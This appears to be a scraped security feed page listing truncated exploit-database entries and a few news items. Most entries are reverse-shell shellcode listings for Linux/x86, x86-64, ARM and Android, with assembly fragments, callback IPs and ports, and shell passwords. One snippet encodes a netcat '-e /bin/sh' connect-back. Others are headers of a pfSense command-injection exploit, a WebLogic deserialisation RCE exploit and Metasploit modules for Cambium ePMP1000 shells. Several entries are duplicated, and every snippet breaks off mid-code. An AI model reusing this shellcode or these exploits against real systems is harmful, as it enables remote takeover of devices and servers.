Multiple HPE IceWall Products Information Disclosure Vulnerabilities

HPE IceWall SSO Dfw and others are products of Hewlett Packard Enterprise HPE, U.S.A. HPE IceWall SSO Dfw is a set of single sign-on software.IceWall MCRP is a reverse proxy software. An information disclosure vulnerability exists in multiple HPE IceWall products. A remote attacker could exploit...

Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh) + Password (MyPasswd) + Null-Free She

/ Title: Linux/ARM - Password Protected Reverse Shell TCP /bin/sh. Null free shellcode 156 bytes Date: 2018-01-15 Tested: armv7l Raspberry Pi v3 Author: rtmcx - twitter: @rtmcx / .section .text .global start start: / Enter Thumb mode / .ARM add r6, pc, 1 bx r6 .THUMB / Create a new socket/ /...

Potent Skygofree Malware Packs ‘Never-Before-Seen’ Features

Researchers have identified a powerful new Android malware strain called Skygofree capable of eavesdropping on WhatsApp messages, siphoning private data off phones and allowing adversaries to open reverse shell modules on targeted devices, giving attackers ultimate remote control. Researchers sai...

Linux/x86-64 - Reverse TCP (127.0.0.1:1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (109 byte

; Title: Shellcode linux/x86-64 connect back shell ; Author : Gaussillusion ; Len : 109 bytes ; Language : Nasm ;syscall: execve"/bin/nc","/bin/nc","ip","1337","-e","/bin/sh",NULL BITS 64 xor rdx,rdx mov rdi,0x636e2f6e69622fff shr rdi,0x08 push rdi mov rdi,rsp mov rcx,0x68732f6e69622fff shr...

Linux/x86-64 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes)

/ Title : reversetcpbindshell 118 bytes Date : 04 October 2013 Author : Russell Willis Testd on: Linux/x8664 SMP Debian 3.2.46-1+deb7u1 x8664 GNU/Linux $ objdump -D reversetcpbindshell -M intel reversetcpbindshell: file format elf64-x86-64 Disassembly of section .text: 0000000000400080 : 400080: ...

Linux/x86-64 - Reverse TCP (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (1

/ ; Author Andriy Brukhovetskyy - doomedraven - SLAEx64 1322 ; 138 bytes global start section .text start: ;socket syscall push byte 0x29 ; 41 socket pop rax push byte 0x2 ; AFINET pop rdi push byte 0x1 ; SOCKSTREAM pop rsi cdq ;rdx = 0 - ANY syscall xchg rdi, rax ; save socket descriptor mov dwo...

Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 byt

; =================================================================== ; Password Protected Reverse Shell ; Author: SLAE64-1351 Keyman ; Date: 04/09/2014 ; ; Shellcode length: 136 bytes ; ; Description: ; ; Simple reverse shell listens on port 4444 by default with ; bytes password protection. Usin...

pfSense 2.1.3 status_rrd_graph_img.php Command Injection

!/usr/bin/env python3 Exploit Title: pfSense = 2.1.3 statusrrdgraphimg.php Command Injection. Date: 2018-01-12 Exploit Author: absolomb Vendor Homepage: https://www.pfsense.org/ Software Link: https://atxfiles.pfsense.org/mirror/downloads/old/ Version: =2.1.3 Tested on: FreeBSD 8.3-RELEASE-p16 CV...

pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection

!/usr/bin/env python3 Exploit Title: pfSense = 2.1.3 statusrrdgraphimg.php Command Injection. Date: 2018-01-12 Exploit Author: absolomb Vendor Homepage: https://www.pfsense.org/ Software Link: https://atxfiles.pfsense.org/mirror/downloads/old/ Version: =2.1.3 Tested on: FreeBSD 8.3-RELEASE-p16 CV...

Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh) + Password (MyPasswd) + Null-Free Shellcode (156 bytes)

Linux/ARM - Reverse TCP 192.168.1.1:4444/TCP Shell /bin/sh + Password MyPasswd + Null-Free Shellcode 156 bytes. Shellcode exploit for ARM platform / Title: Linux/ARM - Password Protected Reverse Shell TCP /bin/sh. Null free shellcode 156 bytes Date: 2018-01-15 Tested: armv7l Raspberry Pi v3 Autho...

Android/ARM - Reverse TCP /system/bin/sh Shell (10.0.2.2:0x3412/TCP) Shellcode (79 bytes)

/ This ARM Thumb sc connects to a given IP and port with a shell. Intended for use with Android hence /system/bin/sh. Connects to the provided IP and port with a shell no null bytes in the code, but does this really matter these days? it could be fixed with just a few instructions. Released to th...

FLARE IDA Pro Script Series: Simplifying Graphs in IDA

Introduction We’re proud to release a new plug-in for IDA Pro users – SimplifyGraph – to help automate creation of groups of nodes in the IDA’s disassembly graph view. Code and binaries are available from the FireEye GitHub repo. Prior to this release we submitted it in the 2017 Hex-Rays plugin...

FLARE IDA Pro Script Series: Simplifying Graphs in IDA

Introduction We’re proud to release a new plug-in for IDA Pro users – SimplifyGraph – to help automate creation of groups of nodes in the IDA’s disassembly graph view. Code and binaries are available from the FireEye GitHub repo. Prior to this release we submitted it in the 2017 Hex-Rays plugin...

Oracle WebLogic < 10.3.6 - wls-wsat Component Deserialisation Remote Command Execution Exploit

Exploit for multiple platform in category remote exploits !/usr/bin/env python -- coding: utf-8 -- Exploit Title: Weblogic wls-wsat Component Deserialization RCE Date Authored: Jan 3, 2018 Date Announced: 10/19/2017 Exploit Author: Kevin Kirsche d3c3pt10n Exploit Github:...

Linux/x86 - Reverse TCP /bin/sh Shell (127.1.1.1:8888/TCP) Null-Free Shellcode (67/69 bytes)

/ Title: Linux/x86 - Reverse TCP Shell /bin/sh 127.1.1.1:8888/TCP Null-Free Shellcode 69 bytes Description: Smallest /bin/sh Reverse TCP ShellcodeNull Free, No Register Pollution Required Date : 4/Jan/2018 Author: Nipun Jaswal @nipunjaswal ; SLAE-1080 Details: Smallest /bin/sh based Null & Regist...

Linux/x86 - Reverse TCP (127.1.1.1:8888/TCP) Shell (/bin/sh) + Null-Free Shellcode (67/69 bytes)

Linux/x86 - Reverse TCP 127.1.1.1:8888/TCP Shell /bin/sh + Null-Free Shellcode 67/69 bytes. Shellcode exploit for Linuxx86 platform / Title: Linux/x86 - Reverse TCP Shell /bin/sh 127.1.1.1:8888/TCP Null-Free Shellcode 69 bytes Description: Smallest /bin/sh Reverse TCP ShellcodeNull Free, No...

BitThunder Buffer Overflow Vulnerability

BitThunder is a scalable embedded operating system. A buffer overflow vulnerability exists in the dtbreverse.c file in the BitThunder 0.9.2 stable release. A remote attacker could exploit this vulnerability to obtain information...

Reverse Engineering Android apk Files: Apktool

ApkTool is a tool for reverse engineering 3rd party, closed, binary Android apps. It can decode resources to nearly original form and rebuild them after making some modifications; it makes possible to debug smali code step by step. Also it makes working with app easier because of project-like fil...

Cambium ePMP1000 - &#039;get_chart&#039; Shell via Command Injection (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Cambium ePMP1000 'getchart' Shell via Command Injection v3.1-3.5-RC7", 'Description' = % This module exploits an OS Command Injection vulnerabilit...

Cambium ePMP1000 - &#039;ping&#039; Shell via Command Injection (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Cambium ePMP1000 'ping' Shell via Command Injection up to v2.5", 'Description' = % This module exploits an OS Command Injection vulnerability in...